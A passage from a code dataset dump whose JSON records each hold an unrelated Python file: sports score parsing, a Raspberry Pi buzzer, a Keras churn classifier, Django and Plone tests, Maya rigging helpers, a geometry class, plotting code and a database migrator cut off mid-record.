home_p1_score = safe_get(player_stat,'tm.1.p1_score')\n home_p2_score = safe_get(player_stat,'tm.1.p2_score')\n home_p3_score = safe_get(player_stat,'tm.1.p3_score')\n home_p4_score = safe_get(player_stat,'tm.1.p4_score')\n home_p5_score = safe_get(player_stat,'tm.1.p5_score')\n away_p1_score = safe_get(player_stat,'tm.2.p1_score')\n away_p2_score = safe_get(player_stat,'tm.2.p2_score')\n away_p3_score = safe_get(player_stat,'tm.2.p3_score')\n away_p4_score = safe_get(player_stat,'tm.2.p4_score')\n away_p5_score = safe_get(player_stat,'tm.2.p5_score')\n home_scores = [home_p1_score,home_p2_score,home_p3_score,home_p4_score,home_p5_score]\n away_scores = [away_p1_score,away_p2_score,away_p3_score,away_p4_score,away_p5_score]\n home_scores_total = sum(home_scores)\n away_scores_total = sum(away_scores)\n if player_stat['inOT'] != 0:\n period = scores_info['period'] + 4\n else:\n period = scores_info['period']\n match_time = scores_info['gt']\n minutes = match_time.split(':')[0]\n second = match_time.split(':')[1]\n seconds = int(minutes) * 60 + int(second)\n if period < 5:\n if match_time == '00:00':\n status_id = 2 * period + 1\n else:\n status_id = 2 * period\n else:\n status_id = 9\n if seconds == 0 and period >= 4 and home_scores_total != away_scores_total:\n status_id = 10\n data = {\n 'sport_id': 2,\n 'site': 'acb',\n 'matches': {\n game_id: {\n 'score': {\n 'tmr': {'ticking': 0, 'coundown': 1, 'addtime': 0, 'second': seconds},\n 'status_id': status_id,\n 'home_scores': home_scores,\n 'away_scores': away_scores,\n }\n }\n }\n }\n return data\n except:\n return 0\n else:\n return 0\n except:\n return 0\n","sub_path":"apps/ACB/acb_score.py","file_name":"acb_score.py","file_ext":"py","file_size_in_byte":4191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"149692422","text":"import RPi.GPIO as GPIO\nimport time\n\nGPIO_BUZZER = 21\nGPIO.setwarning(False)\nGPIO.setmote(GPIO.BCM)\nGPIO.setup(GPIO_BUZZER, GPIO.OUT, initial = GPIO.LOW)\nHz = 440 * 3\np = GPIO.PWM(GPIO_BUZZER, 1)\np.ChangeFrequency(Hz)\np.start(50)\ntime.sleep(0.05)\np.stop()\ntime.sleep(0.05)\np.ChangeFrequency(Hz)\np.start(50)\ntime.sleep(0.05)\np.stop()\nGPIO.cleanup()\n","sub_path":"buzzer.py","file_name":"buzzer.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"195886800","text":"################################################################################\n# Artificial Neural Network #\n# Would a customer leave the bank? #\n# Featuring: #\n# * 10-fold cross validation evaluation schema #\n# * 2 hidden layers #\n# * BatchNormalization #\n################################################################################\n'''\nMake sure python supports tensorflow by installing python version 3.5.3.\nRead the \"py53\" text file\n'''\nimport os\nimport datetime\nimport numpy as np\nimport random\nimport pandas as pd\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom sklearn.model_selection import cross_val_score, train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.metrics import confusion_matrix, accuracy_score\nimport keras\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers.normalization import BatchNormalization\nfrom tensorflow.contrib.keras import backend\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' # filter out WARNING logs\n\n\n#########################\n# Define the ANN schema #\n#########################\ndef build_classifier():\n classifier = Sequential(layers=None) # the design of the layers would be manual\n # Add the input layer and the first hidden layer\n classifier.add(Dense(units=6, kernel_initializer='uniform', activation='relu', input_dim=11))\n classifier.add(BatchNormalization())\n # Add a second hidden layer\n classifier.add(Dense(units=6, kernel_initializer='uniform', activation='relu'))\n classifier.add(BatchNormalization())\n # Add the output layer\n classifier.add(Dense(units=1, kernel_initializer='uniform', activation='sigmoid'))\n # Compiling the ANN\n classifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n # Return the classifier\n return classifier\n\n\nif __name__ == \"__main__\":\n ################\n # Get the Data #\n ################\n # Importing the dataset\n dataset = pd.read_csv(os.path.join('data', 'Churn_Modelling.csv')) # , index_col='RowNumber')\n # Keep only useful columns\n dataset.drop(['RowNumber', 'CustomerId', 'Surname'], axis=1, inplace=True)\n X = dataset.drop(['Exited'], axis=1).values # returns numpy.ndarry\n y = dataset.loc[:, 'Exited'].values\n\n ######################\n # Data Preprocessing #\n ######################\n # 1. Encoding the Independent (categorical) Variables\n # Convert labels [Germany, France, Spain] into levels [1, 2, 3]\n labelencoder_X_1 = LabelEncoder()\n X[:, 1] = labelencoder_X_1.fit_transform(X[:, 1])\n labelencoder_X_2 = LabelEncoder()\n X[:, 2] = labelencoder_X_2.fit_transform(X[:, 2])\n # 2. Convert levels [1, 2, 3] into one-hot representation [001, 010, 100]\n onehotencoder = OneHotEncoder(categorical_features=[1])\n X = onehotencoder.fit_transform(X).toarray()\n # 3. Remove a single one-hot variable to avoid the dummy variable trap\n X = X[:, 1:] # remove column 0\n\n #####################\n # Split the Dataset #\n #####################\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=1633)\n\n ###################\n # Feature Scaling #\n ###################\n sc = StandardScaler()\n X_train = sc.fit_transform(X_train)\n X_test = sc.transform(X_test)\n\n #################\n # Train the ANN #\n #################\n random.seed(1553)\n # Global classifier variable\n classifier = KerasClassifier(\n # Supply the ANN architecture\n build_fn=build_classifier,\n # Supply the training parameters\n batch_size=10,\n epochs=100)\n\n # Execute cross validation\n time_0 = datetime.datetime.now()\n accuracies = cross_val_score(estimator=classifier,\n X=X_train, y=y_train,\n cv=8,\n n_jobs=-1)\n time_taken = datetime.datetime.now() - time_0\n\n ######################\n # Evaluate the Model #\n ######################\n mean = accuracies.mean()\n var = accuracies.std() ** 2\n\n #############################\n # Remove model form CPU/GPU #\n #############################\n backend.clear_session()\n\n #################\n # Print Results #\n #################\n print('\\n###########################################################')\n print('# Avg Accuracy: ' + str(mean)) # Avg Accuracy: 0.8361\n print('# Variance: ' + str(var)) # Variance: 0.0002\n print('# Time: ' + str(time_taken)) # Time: 0:03:38\n print('###########################################################\\n')\n","sub_path":"topic_1_ANN/banking_churn_basic_K_fold_CV.py","file_name":"banking_churn_basic_K_fold_CV.py","file_ext":"py","file_size_in_byte":4976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"178632369","text":"# This file is placed in the Public Domain.\n\n\n\"commands\"\n\n\nfrom ..objects import Object\n\n\ndef __dir__():\n return (\n 'Command',\n )\n\n\n__all__ = __dir__()\n \n\nclass Command(Object):\n\n cmds = Object()\n errors = []\n\n @staticmethod\n def add(cmd):\n setattr(Command.cmds, cmd.__name__, cmd)\n\n @staticmethod\n def dispatch(evt):\n if not evt.isparsed:\n evt.parse(evt.txt)\n func = getattr(Command.cmds, evt.cmd, None)\n if func:\n try:\n func(evt)\n except Exception as ex:\n exc = ex.with_traceback(ex.__traceback__)\n Command.errors.append(exc)\n evt.ready()\n return None\n evt.show()\n evt.ready()\n\n @staticmethod\n def remove(cmd):\n delattr(Command.cmds, cmd)\n","sub_path":"rssbot/runtime/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"298248598","text":"def split(line, types=None, delimiter=None):\n \"\"\"Splits a line of test and optionally performs type conversion.\n For example:\n\n >>> split('GOOD 100 490.50')\n ['GOOD', '100', '490.50']\n >>> split('GOOD 100 490.50', [str, int, float])\n ['GOOD', 100, 490.50]\n >>>\n By default, splitting is perfomed on whitespace, but a different delimiter\n can be selected with the delimiter keyword argument:\n\n >>> split('GOOD, 100, 490.50', delimiter=',')\n ['GOOOD', '100', '490.50']\n >>>\n \"\"\"\n\n fields = line.split(delimiter)\n if types:\n fields = [ty(val) for ty, val in zip(types, fields)]\n return fields\n\nif __name__ == '__main__':\n # test myself\n import doctest\n doctest.testmod(verbose=True)","sub_path":"pyDemo/doc_test/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"205899849","text":"import csv\n\nfrom django.test import TestCase\n\nfrom django_test_tools.file_utils import temporary_file\nfrom django_test_tools.mixins import TestOutputMixin\n\n\nclass TestTestOutputMixin(TestCase):\n @temporary_file('csv', delete_on_exit=True)\n def test_get_csv_content(self):\n outputfile = self.test_get_csv_content.filename\n with open(outputfile, 'w', encoding='utf-8') as csvfile:\n csv_writer = csv.writer(csvfile, delimiter=',')\n csv_writer.writerow(['Title 1', 'Title 2', 'Title 3', 'Title 4', 'Title 5'])\n for i in range(0, 6):\n csv_writer.writerow(['Data {0}'.format(i)] * 5)\n\n output_mixin = TestOutputMixin()\n data = output_mixin.get_csv_content(outputfile)\n self.assertEqual(7, len(data))\n self.assertEqual('Title 1', data[0][0])\n","sub_path":"tests/test_mixins.py","file_name":"test_mixins.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"553594505","text":"from ftw.testbrowser import browsing\nfrom opengever.bumblebee.events import PDFDownloadedEvent\nfrom opengever.journal.handlers import DOCUMENT_ADDED_ACTION\nfrom opengever.testing import IntegrationTestCase\nfrom opengever.testing.readonly import ZODBStorageInReadonlyMode\nfrom zope.event import notify\nimport transaction\n\n\nclass TestFileDownloadInReadOnly(IntegrationTestCase):\n\n features = ('bumblebee', )\n\n @browsing\n def test_file_download_journaling_doesnt_cause_readonly_error(self, browser):\n self.login(self.regular_user, browser)\n\n # Get other potential writes-on-read out of the way.\n # Those are not what we're testing here.\n browser.open(self.document,\n view='tabbed_view/listing',\n data={'view_name': 'overview'})\n transaction.commit()\n\n with ZODBStorageInReadonlyMode():\n browser.find('Download copy').click()\n browser.find('Download').click()\n transaction.commit()\n\n self.assertEqual(200, browser.status_code)\n self.assertEqual(self.document.file._data, browser.contents)\n\n self.assertEqual(\n len(self.document.file._data),\n int(browser.headers['Content-Length']))\n\n self.assertEqual(\n 'application/vnd.openxmlformats-officedocument.'\n 'wordprocessingml.document',\n browser.headers['Content-Type'])\n\n @browsing\n def test_downloading_doc_pdf_journaling_doesnt_cause_readonly_error(self, browser):\n self.login(self.regular_user, browser)\n\n with ZODBStorageInReadonlyMode():\n notify(PDFDownloadedEvent(self.document))\n transaction.commit()\n\n # Last journal entry should be document added, not 'PDF downloaded'\n msg = u'Document added: Vertr\\xe4gsentwurf'\n self.assert_journal_entry(self.document, DOCUMENT_ADDED_ACTION, msg)\n\n @browsing\n def test_downloading_mail_pdf_journaling_doesnt_cause_readonly_error(self, browser):\n self.login(self.regular_user, browser)\n\n with ZODBStorageInReadonlyMode():\n notify(PDFDownloadedEvent(self.mail_eml))\n transaction.commit()\n\n # Last journal entry should be document added, not 'PDF downloaded'\n msg = u'Document added: Die B\\xfcrgschaft'\n self.assert_journal_entry(self.mail_eml, DOCUMENT_ADDED_ACTION, msg)\n","sub_path":"opengever/readonly/tests/test_file_download.py","file_name":"test_file_download.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"177996109","text":"import pymel.core as pymel\nimport logging\n\n'''\nThis method facilitate the creation of utility nodes by connecting/settings automaticly attributes.\n'''\n__aBasicTypes = [int, float, bool, pymel.datatypes.Matrix, pymel.datatypes.Vector]\ndef _isBasicType(_val):\n global __aBasicTypes\n return type(_val) in __aBasicTypes\n\ndef ConnectOrSetAttr(_attr, _val):\n if isinstance(_val, list) or isinstance(_val, tuple):\n\n # Note: List attribute and compound attribute don't have the same way of iterating.\n if _attr.isArray():\n for i, val in enumerate(_val):\n ConnectOrSetAttr(_attr.elementByLogicalIndex(i), val)\n elif _attr.isCompound():\n children = _attr.getChildren()\n for child, val in zip(children, _val):\n ConnectOrSetAttr(child, val)\n else:\n raise Exception(\"Can't apply value {0} on attribute {1}, need an array or compound\".format(_val, _attr))\n\n '''\n for i, pSubValue in enumerate(_val):\n ConnectOrSetAttr(_attr.elementByLogicalIndex(i), pSubValue)\n '''\n else:\n if isinstance(_val, pymel.Attribute):\n pymel.connectAttr(_val, _attr, force=True)\n elif _isBasicType(_val):\n _attr.set(_val)\n else:\n logging.error(\n '[ConnectOrSetAttr] Invalid value for attribute {0} of type {1} and value {2}'.format(_attr.name(),\n type(_val),\n _val))\n raise TypeError\n\ndef CreateUtilityNode(_sClass, *args, **kwargs):\n uNode = pymel.shadingNode(_sClass, asUtility=True)\n for sAttrName, pAttrValue in kwargs.items():\n if not uNode.hasAttr(sAttrName):\n raise Exception('[CreateUtilityNode] UtilityNode {0} doesn\\'t have an {1} attribute. Skipping it.'.format(_sClass, sAttrName))\n else:\n ConnectOrSetAttr(uNode.attr(sAttrName), pAttrValue)\n return uNode\n\n#\n# CtrlShapes Backup\n#\ndef hold_ctrl_shapes(_oCtrl, parent=None):\n aShapes = filter(lambda x: isinstance(x, pymel.nodetypes.CurveShape), _oCtrl.getShapes())\n oSnapshot = pymel.duplicate(_oCtrl, parentOnly=True, returnRootsOnly=True)[0]\n for oShape in aShapes:\n oShape.setParent(oSnapshot, s=True, r=True)\n if parent:\n oSnapshot.setParent(parent)\n else:\n oSnapshot.setParent(world=True)\n oSnapshot.rename('_{0}'.format(_oCtrl.name()))\n return oSnapshot\n\ndef fetch_ctrl_shapes(source, target):\n # Remove any previous shapes\n pymel.delete(filter(lambda x: isinstance(x, pymel.nodetypes.CurveShape), target.getShapes()))\n for source_shape in source.getShapes():\n source_shape.setParent(target, r=True, s=True)\n source_shape.rename(target.name() + 'Shape')\n\n # TODO: Restore AnnotationShapes\n pymel.delete(source)\n\ndef BackupCtrlShapes(**kwargs):\n aCtrls = [o.getParent() for o in pymel.ls('anm_*', type='nurbsCurve')]\n return [hold_ctrl_shapes(oCtrl, **kwargs) for oCtrl in aCtrls]\n\n# TODO: Fix bug when two objects have the same name.\ndef RestoreCtrlShapes():\n aSources = [o.getParent() for o in pymel.ls('_anm_*', type='nurbsCurve')]\n\n for oSource in aSources:\n sTargetName = oSource.name()[1:]\n if pymel.objExists(sTargetName):\n oTarget = pymel.PyNode(str(sTargetName))\n\n fetch_ctrl_shapes(oSource, oTarget)\n #pymel.delete(oSource)\n\ndef create_squash_atts(attStretch, numSegments):\n import libFormula\n if not isinstance(attStretch, pymel.Attribute):\n raise IOError(\"Expected pymel Attribute, got {0} ({1})\".format(attStretch, type(attStretch)))\n return_vals = []\n for i in range(numSegments):\n pos = float(i)/(numSegments-1) * 2.0 - 1.0\n attSquash = libFormula.parse(\"s^(e^(x^2)))\", s=attStretch, x=pos)\n return_vals.append(attSquash)\n return return_vals\n","sub_path":"omtk/libs/libRigging.py","file_name":"libRigging.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"109270016","text":"#!/usr/bin/python3\n\n'''module for shapes'''\n\n\nfrom .base import Base\nfrom sys import stdout\n\n\nclass Rectangle(Base):\n '''Rectangle Class that inherits from Base Class'''\n def __init__(self, width, height, x=0, y=0, id=None):\n '''Initialisation of the instance'''\n super().__init__(id)\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n\n # *********** Properties Setters and Getters Section *************\n\n # width Property\n @property\n def width(self):\n '''retrieves the __width attribute value'''\n return self.__width\n\n @width.setter\n def width(self, value):\n '''sets the new value to the __width attribute'''\n if type(value) is not int:\n raise TypeError('width must be an integer')\n if value <= 0:\n raise ValueError('width must be > 0')\n self.__width = value\n\n # height Property\n @property\n def height(self):\n '''retrieves the __height attribute value'''\n return self.__height\n\n @height.setter\n def height(self, value):\n '''sets the new value to the __height attribute'''\n if type(value) is not int:\n raise TypeError('height must be an integer')\n if value <= 0:\n raise ValueError('height must be > 0')\n self.__height = value\n\n # x Property\n @property\n def x(self):\n '''retrieves the __x attribute value'''\n return self.__x\n\n @x.setter\n def x(self, value):\n '''sets the new value to the __x attribute'''\n if type(value) is not int:\n raise TypeError('x must be an integer')\n if value < 0:\n raise ValueError('x must be >= 0')\n self.__x = value\n\n # y Property\n @property\n def y(self):\n '''retrieves the __y attribute value'''\n return self.__y\n\n @y.setter\n def y(self, value):\n '''sets the new value to the __y attribute'''\n if type(value) is not int:\n raise TypeError('y must be an integer')\n if value < 0:\n raise ValueError('y must be >= 0')\n self.__y = value\n\n # **** End of Properties Setters and Getters Section *****\n\n # *************** Instance Methods Section ***************\n\n def area(self):\n '''calculates the rectangle area\n Returns:\n the calculation result \"the area\"\n '''\n return self.width * self.height\n\n def display(self):\n '''prints the rectangle instance with the # character'''\n buffer = [' ' * self.x + '#' * self.width for h in range(self.height)]\n print('\\n' * self.y + '\\n'.join(buffer))\n\n def update(self, *args, **kwargs):\n '''Updates the instance attributes from\n the arguments passed in a strict order\n or from the kwargs\n '''\n i = 0\n attributes = ['id', 'width', 'height', 'x', 'y']\n if len(args) > 0:\n for attr in attributes:\n if i > len(args) - 1:\n break\n setattr(self, attr, args[i])\n i += 1\n else:\n for key, value in kwargs.items():\n if key not in attributes:\n continue\n setattr(self, key, value)\n\n def to_dictionary(self):\n '''returns the dictionary representation of a Rectangle instance'''\n return {\n 'id': self.id,\n 'x': self.x,\n 'y': self.y,\n 'width': self.width,\n 'height': self.height\n }\n\n # *********** End of Instance Methods Section ************\n\n # **************** Magic Methods Section *****************\n\n def __str__(self):\n '''returns the string representation fo the instance'''\n return (f'[Rectangle] ({self.id}) {self.x}/{self.y}'\n f' - {self.width}/{self.height}')\n\n # ************ End of Magic Methods Section **************\n","sub_path":"0x0C-python-almost_a_circle/models/rectangle.py","file_name":"rectangle.py","file_ext":"py","file_size_in_byte":3975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"248031881","text":"import torch\nimport numpy as np\nimport seaborn as sns\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MultipleLocator, AutoMinorLocator\nfrom compress_training import DATASETS\nfrom glob import glob\n\n# These attribute are for retro compatibility with\n# Experiments that did not have them\nDEFAULT_EXTRA_PARAMS = ['compression']\n\ndef summarize_experiment(experiment, extra_params):\n val_acc = experiment[experiment.measure == 'val_acc']\n best_val = val_acc.sort_values(by='value', ascending=False).iloc[0]\n epoch = best_val.epoch\n summary = experiment[experiment.epoch==epoch].groupby('measure').mean()\n keys = list(summary.index) + ['time', 'epoch', 'lambda_start', 'lambda_decay', 'layers', 'iteration', 'algorithm']\n\n values = list(summary.value) + [float(best_val.time), int(epoch)] + list(extra_params)\n missing_values = len(keys) - len(values) # Computing the number of missin paramters\n # Adding default values for the missing parmaeters\n if missing_values > 0:\n values += DEFAULT_EXTRA_PARAMS[-missing_values:]\n result = pd.DataFrame([values], columns=keys)\n if min(experiment[experiment.measure == 'lambda'].epoch) == 0: # Solve bug\n test = experiment[experiment.epoch==epoch-1].groupby('measure').mean()\n result['lambda'] = pd.Series([test.loc['lambda'].value])\n return result\n\ndef merge_all_experiments(experiments):\n return pd.concat(experiments).fillna(0)\n\ndef get_experiments(experiment_name):\n files = glob('./experiments/%s/*.experiment' % experiment_name)\n experiments = [torch.load(x, 'rb') for x in files]\n ids = [x.split('/')[-1].replace('.experiment', '') for x in files]\n return ids, experiments\n\ndef get_summary(experiments):\n summarized = [summarize_experiment(x[1], x[0]) for x in experiments]\n summary = merge_all_experiments([x for x in summarized if x is not None])\n # summary['lambda_start'] = np.log10(summary['lambda_start'])\n summary.reset_index(drop=True, inplace=True)\n return summary\n\ndef best_experiment(summary, experiments, mode):\n s = summary.sort_values(by='val_acc')\n best = s.iloc[-1]\n return [x for x in experiments if x[1][x[1].measure == 'val_acc'].value.max() == best.val_acc][0]\n\ndef plot_experiment(experiment, prefix, mode):\n infos, x = experiment\n capacities = x[x.measure == 'capacity']\n train_acc = x[x.measure == 'mean_train_acc']\n test_acc = x[x.measure == 'test_acc']\n val_acc = x[x.measure == 'val_acc']\n best_val_acc_idx = val_acc.value.argmax()\n s = summarize_experiment(x, infos).iloc[0]\n best_val_acc = s.val_acc\n best_test_acc = s.test_acc\n best_capacity = s.capacity\n fig = plt.figure(figsize=(10, 5))\n a = fig.gca()\n a.grid()\n a.set_xlabel('Time (s)')\n b = a.twinx()\n b.set_yscale('log')\n b.set_ylabel('Capacity in neurons')\n b.plot(capacities.time, capacities.value, label='Total Capacity')\n if mode == 'classification':\n a.set_ylabel('Accuracy (%)')\n a.plot(train_acc.time, train_acc.value * 100, label='Train accuracy')\n a.plot(val_acc.time, val_acc.value * 100, label='Validation accuracy')\n a.plot(test_acc.time, test_acc.value * 100, label='Test accuracy')\n a.yaxis.set_minor_locator(MultipleLocator(0.1))\n a.yaxis.set_major_locator(MultipleLocator(1))\n a.legend(loc='lower left')\n else:\n a.set_ylabel('MSE')\n a.plot(train_acc.time, -train_acc.value, label='Train Error')\n a.plot(val_acc.time, -val_acc.value, label='Validation Error')\n a.plot(test_acc.time, -test_acc.value, label='Test Error')\n a.set_yscale('log')\n a.legend(loc='upper right')\n a.yaxis.grid(b=True, which='major', linestyle='-')\n a.yaxis.grid(b=True, which='minor', alpha=0.4, linestyle='--')\n a.xaxis.grid(b=True, which='major', linestyle='-')\n a.xaxis.grid(b=True, which='minor', alpha=0.4, linestyle='--')\n plt.title('%s - Best Model (%s layer(s), %s neurons, v=%s, t=%s)' % (prefix, infos[2], int(best_capacity), -best_val_acc, -best_test_acc))\n # plt.savefig('./plots/%s_compressor_accuracies_size.png' % prefix)\n # plt.close()\n\n\ndef remove_outliers(summaries, dataset_name):\n outlier_limit = (-np.inf, np.inf)\n if dataset_name == 'Add10':\n outlier_limit = (0, 1.3)\n elif dataset_name == 'Airfoil':\n outlier_limit = (0, 25)\n elif dataset_name == 'Poker':\n outlier_limit = (0.95, 1)\n tac = np.abs(summaries.test_acc)\n return summaries[np.bitwise_and(tac >= outlier_limit[0], tac <= outlier_limit[1])]\n\n\ndef plot_algorithm_comparison(summaries, dataset_name, mode='classification', metric='val_acc', first='compression', other='static'):\n cmap_first = 'Greens'\n cmap_second = 'Reds'\n\n first_summaries = summaries[summaries.algorithm == first]\n second_summaries = summaries[summaries.algorithm == other]\n plt.figure()\n if mode == 'classification':\n factor1 = 100\n factor2 = 100\n else:\n factor1 = -1\n factor2 = -1\n if metric != 'val_acc':\n factor1 = 1\n\n other = len(second_summaries[metric]) > 0\n sns.kdeplot(factor1 * first_summaries[metric], factor2 * first_summaries.test_acc, cmap=cmap_first, shade_lowest=False,shade=True, alpha=0.8, label=False)\n if other:\n sns.kdeplot(factor1 * second_summaries[metric], factor2 * second_summaries.test_acc, cmap=cmap_second, shade_lowest=False,shade=True, alpha=0.5, label=False)\n plt.scatter(factor1 * first_summaries[metric], factor2 * first_summaries.test_acc, alpha=1, color=sns.color_palette(cmap_first)[1], edgecolors='0.3', label=None)\n if other:\n plt.scatter(factor1 * second_summaries[metric], factor2 * second_summaries.test_acc, alpha=0.5, color=sns.color_palette(cmap_second)[1], edgecolors='0.3', label=None)\n a = plt.gca()\n a.yaxis.set_minor_locator(AutoMinorLocator())\n a.xaxis.set_minor_locator(AutoMinorLocator())\n if mode == 'classification':\n plt.ylabel('Testing accuracy (%)')\n if metric == 'val_acc':\n plt.xlabel('Validation accuracy (%)')\n # a.yaxis.set_minor_locator(MultipleLocator(0.1))\n # a.yaxis.set_major_locator(MultipleLocator(1))\n # a.xaxis.set_minor_locator(MultipleLocator(0.1))\n # a.xaxis.set_major_locator(MultipleLocator(1))\n elif metric == 'capacity':\n plt.xlabel('Capacity in neurons')\n else:\n plt.ylabel('Testing MSE')\n if metric == 'val_acc':\n plt.xlabel('Validation MSE')\n elif metric == 'capacity':\n plt.xlabel('Capacity in neurons')\n\n a.yaxis.grid(b=True, which='major', linestyle='-')\n a.yaxis.grid(b=True, which='minor', alpha=0.4, linestyle='--')\n a.xaxis.grid(b=True, which='major', linestyle='-')\n a.xaxis.grid(b=True, which='minor', alpha=0.4, linestyle='--')\n a.set_axisbelow(True)\n if 'reference' in DATASETS[dataset_name]:\n plt.axhline(abs(factor2) *DATASETS[dataset_name]['reference'], label='Best result for this architecture')\n handles, labels = [list(x) for x in a.get_legend_handles_labels()]\n else:\n handles = []\n labels = []\n\n first_rectangle = plt.Rectangle((0, 0), 1, 1, color=sns.color_palette(cmap_first)[-3])\n second_rectangle = plt.Rectangle((0, 0), 1, 1, color=sns.color_palette(cmap_second)[-3])\n plt.legend([first_rectangle, second_rectangle] + handles, ['Deterministic Compression Training', 'Classic Training'] + labels)\n plt.gcf().set_size_inches((10, 10))\n if metric == 'val_acc':\n plt.axes().set_aspect('equal', 'datalim')\n plt.title('%s - Algorithm comparision for testing and validation accuracies' % dataset_name)\n else:\n plt.title('%s - Algorithm comparision for testing and capacity' % dataset_name)\n plt.savefig('./plots/%s_test_%s_compression_static_comparison.png' % (dataset_name, metric))\n plt.close()\n\ndef plot_dataset(dataset_name, mode='classification'):\n ids, experiments = get_experiments(dataset_name)\n summaries = remove_outliers(get_summary(experiments), dataset_name)\n best = best_experiment(summaries, experiments, mode=mode)\n plot_experiment(best, dataset_name, mode)\n plot_algorithm_comparison(summaries, dataset_name, mode, metric='val_acc')\n plot_algorithm_comparison(summaries, dataset_name, mode, metric='capacity')\n try:\n pairs = find_closest_experiments(summaries)\n plot_compression_improvements(pairs, dataset_name, mode)\n except:\n pass # Pass if correspondig are not generated\n\ndef find_closest_experiments(summaries, first='compression', second='static'):\n first_summaries = summaries[summaries.algorithm == first].sort_values('val_acc', ascending=False).drop_duplicates(['capacity'])\n second_summaries = summaries[summaries.algorithm == second].sort_values('val_acc', ascending=False).drop_duplicates(['capacity'])\n first_cap = first_summaries.capacity\n second_cap = second_summaries.capacity\n\n result = []\n for i, x in enumerate(first_cap):\n index = np.argmin(np.abs(second_cap.values - x))\n a = first_summaries.iloc[i]\n b = second_summaries.iloc[index]\n result.append((a, b))\n return result\n\ndef plot_compression_improvements(pairs, dataset_name, mode='classification'):\n plt.figure(figsize=(10, 5))\n if mode == 'classification':\n factor = 100\n else:\n factor = 1\n plt.scatter([x[0].capacity for x in pairs], [(x[0].test_acc - x[1].test_acc) * factor for x in pairs],\n color='C1', linewidth=1, marker='o', s=100, edgecolor='black')\n a = plt.gca()\n plt.xscale('log')\n plt.title('%s - Improvement in testing accuracy for compress training at fixed capacity' % dataset_name)\n plt.axhline(y=0, color='black', linewidth=3)\n plt.xlabel('Model capacity (neurons)')\n if mode == 'classification':\n plt.ylabel('Absolute MSE delta')\n a.yaxis.set_minor_locator(AutoMinorLocator())\n a.yaxis.grid(b=True, which='minor', alpha=0.4, linestyle='--')\n a.xaxis.grid(b=True, which='minor', alpha=0.4, linestyle='--')\n a.yaxis.grid(b=True, which='major', linestyle='-')\n a.xaxis.grid(b=True, which='major', linestyle='-')\n plt.savefig('./plots/%s_compression_training_improvements.png' % dataset_name)\n plt.close()\n\n\nif __name__ == '__main__':\n # plot_dataset('MNIST')\n # plot_dataset('FashionMNIST')\n # plot_dataset('Poker')\n # plot_dataset('Add10', mode='regression')\n # plot_dataset('Airfoil', mode='regression')\n pass\n","sub_path":"expriment_summary.py","file_name":"expriment_summary.py","file_ext":"py","file_size_in_byte":10543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"190099789","text":"\"\"\"SysMonitor Database migration tool\"\"\"\n\nimport logging\nimport os\nimport importlib\nimport re\nimport ast\n\nfrom playhouse.db_url import connect\nfrom playhouse.migrate import PostgresqlMigrator, SqliteMigrator, MySQLMigrator\n\nfrom sysmonitor.configuration import Configuration\nfrom sysmonitor import release\n\nfrom sysmonitor.models.database import DatabaseVariable\nfrom sysmonitor.models.host import Host, Disk, Resource, Service, ServiceHistory\n\nLOGGER = logging.getLogger(__name__)\n\nclass Migrator():\n \"\"\"\n Migration Tool\n\n It executes migration scriptsw when needed.\n\n This scripts must be located inside a file named migrate.py, under a\n folder with the target version as name and inside the migrations folder.\n Example for a migration targeting version 1.0.0:\n migrations/1.0.1/migrate.py\n\n Inside the file, the migration code mut be inside a function called migrate\n and it receives one argument, the database object\n \"\"\"\n def __init__(self):\n self.config = Configuration()\n db_url = self.config.get(\"database\", \"url\")\n self.database = connect(db_url)\n if \"postgresql\" in db_url:\n self.migrator_class = PostgresqlMigrator\n elif \"mysql\" in db_url:\n self.migrator_class = MySQLMigrator\n elif \"sqlite\" in db_url:\n self.migrator_class = SqliteMigrator\n else:\n raise ValueError(\"Invalid database type for migrations\")\n\n\n def do_migration(self):\n \"\"\"\n Execute the migration.\n\n If no tables exists, it runs peewee create_table method.\n If tables exists, it runs the necessar migration scripts\n \"\"\"\n self.database.connect()\n if self.database.get_tables():\n self.upgrade()\n else:\n self.create()\n self.update_version()\n\n def create(self):\n \"\"\"Create tables using peewee create_tables method\"\"\"\n self.database.create_tables([DatabaseVariable, Host, Disk, Resource,\n Service, ServiceHistory])\n LOGGER.info(\"Created tables\")\n uname = os.uname()\n Host.create(name=uname.nodename, address=\"http://127.0.0.1:8068\",\n requires_authentication=False, active=False,\n nodename=uname.nodename, os=\" \".join(uname))\n LOGGER.info(\"Created a host for this machine\")\n\n def upgrade(self):\n \"\"\"Executes migration scripts\"\"\"\n # Check if upgrade is required\n db_version = ast.literal_eval(DatabaseVariable.get_variable(\"version\"))\n if db_version >= release.version_db:\n LOGGER.debug(\"Database in version %s. Nothing to do.\",\n \".\".join([str(x) for x in release.version_db]))\n return\n\n # Load all available migrations\n migrations_path = 